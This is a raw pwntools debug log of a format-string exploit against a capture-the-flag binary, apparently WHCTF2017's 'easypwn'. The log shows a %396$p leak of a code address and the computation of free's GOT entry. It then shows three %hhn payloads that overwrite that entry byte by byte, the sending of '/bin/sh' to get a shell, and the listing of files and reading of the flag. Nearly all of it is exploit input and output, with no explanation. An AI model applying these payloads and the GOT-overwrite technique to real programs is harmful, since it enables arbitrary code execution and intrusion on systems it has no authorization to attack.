b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%396$p\n'
[DEBUG] Received 0x1 bytes:
b'\n'
[DEBUG] Received 0x421 bytes:
b'Your Input Is :aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%396$p\n'
b'0x55e0a5c1ada0\n'
b'\n'
b'Input Your Code:\n'
[*] init_real_addr: 0x55e0a5c1ada0
[*] free_got_addr: 0x55e0a5e1c018
b'bb%146c%133$hhnA'
146 69 66
[DEBUG] Sent 0x2 bytes:
b'1\n'
[DEBUG] Received 0x15 bytes:
b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x401 bytes:
00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
000003e0 61 61 61 61 61 61 61 61 62 62 25 31 34 36 63 25 │aaaa│aaaa│bb%1│46c%│
000003f0 31 33 33 24 68 68 6e 41 18 c0 e1 a5 e0 55 00 00 │133$│hhnA│····│·U··│
00000400 0a │·│
00000401
[DEBUG] Received 0x1 bytes:
b'\n'
[DEBUG] Received 0x4a4 bytes:
00000000 59 6f 75 72 20 49 6e 70 75 74 20 49 73 20 3a 61 │Your│ Inp│ut I│s :a│
00000010 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
000003f0 61 61 61 61 61 61 61 62 62 25 31 34 36 63 25 31 │aaaa│aaab│b%14│6c%1│
00000400 33 33 24 68 68 6e 41 18 c0 e1 a5 e0 55 20 20 20 │33$h│hnA·│····│U │
00000410 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 │ │ │ │ │
*
00000490 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 49 │ │ │ │ ·I│
000004a0 6e 70 75 74 │nput│
000004a4
[DEBUG] Received 0xc bytes:
b' Your Code:\n'
[DEBUG] Sent 0x2 bytes:
b'1\n'
[DEBUG] Received 0x15 bytes:
b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x401 bytes:
00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
000003e0 61 61 61 61 61 61 61 61 62 62 25 36 39 63 25 31 │aaaa│aaaa│bb%6│9c%1│
000003f0 33 33 24 68 68 6e 41 41 19 c0 e1 a5 e0 55 00 00 │33$h│hnAA│····│·U··│
00000400 0a │·│
00000401
[DEBUG] Received 0x1 bytes:
b'\n'
[DEBUG] Received 0x463 bytes:
00000000 59 6f 75 72 20 49 6e 70 75 74 20 49 73 20 3a 61 │Your│ Inp│ut I│s :a│
00000010 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
000003f0 61 61 61 61 61 61 61 62 62 25 36 39 63 25 31 33 │aaaa│aaab│b%69│c%13│
00000400 33 24 68 68 6e 41 41 19 c0 e1 a5 e0 55 20 20 20 │3$hh│nAA·│····│U │
00000410 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 │ │ │ │ │
*
00000450 20 0a 49 6e 70 75 74 20 59 6f 75 72 20 43 6f 64 │ ·In│put │Your│ Cod│
00000460 65 3a 0a │e:·│
00000463
[DEBUG] Sent 0x2 bytes:
b'1\n'
[DEBUG] Received 0x15 bytes:
b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x401 bytes:
00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
000003e0 61 61 61 61 61 61 61 61 62 62 25 36 36 63 25 31 │aaaa│aaaa│bb%6│6c%1│
000003f0 33 33 24 68 68 6e 41 41 1a c0 e1 a5 e0 55 00 00 │33$h│hnAA│····│·U··│
00000400 0a │·│
00000401
[DEBUG] Received 0x1 bytes:
b'\n'
[DEBUG] Received 0x460 bytes:
00000000 59 6f 75 72 20 49 6e 70 75 74 20 49 73 20 3a 61 │Your│ Inp│ut I│s :a│
00000010 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
000003f0 61 61 61 61 61 61 61 62 62 25 36 36 63 25 31 33 │aaaa│aaab│b%66│c%13│
00000400 33 24 68 68 6e 41 41 1a c0 e1 a5 e0 55 20 20 20 │3$hh│nAA·│····│U │
00000410 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 │ │ │ │ │
*
00000440 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 49 │ │ │ │ ·I│
00000450 6e 70 75 74 20 59 6f 75 72 20 43 6f 64 65 3a 0a │nput│ You│r Co│de:·│
00000460
[DEBUG] Sent 0x2 bytes:
b'2\n'
[DEBUG] Received 0x11 bytes:
b'Input Your Name:\n'
[DEBUG] Sent 0x8 bytes:
b'/bin/sh\n'
[*] Switching to interactive mode
[DEBUG] Received 0x21 bytes:
b'OK!I Know Your Name :/bin/sh\n'
b'Now!'
OK!I Know Your Name :/bin/sh
Now!$ ls
[DEBUG] Sent 0x3 bytes:
b'ls\n'
[DEBUG] Received 0x64 bytes:
b'bin\n'
b'boot\n'
b'dev\n'
b'etc\n'
b'home\n'
b'lib\n'
b'lib32\n'
b'lib64\n'
b'media\n'
b'mnt\n'
b'opt\n'
b'proc\n'
b'root\n'
b'run\n'
b'sbin\n'
b'srv\n'
b'start.sh\n'
b'sys\n'
b'tmp\n'
b'usr\n'
b'var\n'
bin
boot
dev
etc
home
lib
lib32
lib64
media
mnt
opt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
$ cat flag
[DEBUG] Sent 0x9 bytes:
b'cat flag\n'
[DEBUG] Received 0x5 bytes:
b'cat: '
cat: [DEBUG] Received 0x20 bytes:
b'flag: No such file or directory\n'
flag: No such file or directory
$ cd home
[DEBUG] Sent 0x8 bytes:
b'cd home\n'
$ ls
[DEBUG] Sent 0x3 bytes:
b'ls\n'
[DEBUG] Received 0x5 bytes:
b'xctf\n'
xctf
$ cd xctf
[DEBUG] Sent 0x8 bytes:
b'cd xctf\n'
$ ls
[DEBUG] Sent 0x3 bytes:
b'ls\n'
[DEBUG] Received 0x25 bytes:
b'bin\n'
b'dev\n'
b'easypwn\n'
b'flag\n'
b'lib\n'
b'lib32\n'
b'lib64\n'
bin
dev
easypwn
flag
lib
lib32
lib64
$ cat flag
[DEBUG] Sent 0x9 bytes:
b'cat flag\n'
[DEBUG] Received 0x2d bytes:
b'cyberpeace{************************c97f2888818ecf}\n'
cyberpeace{************************c97f2888818ecf}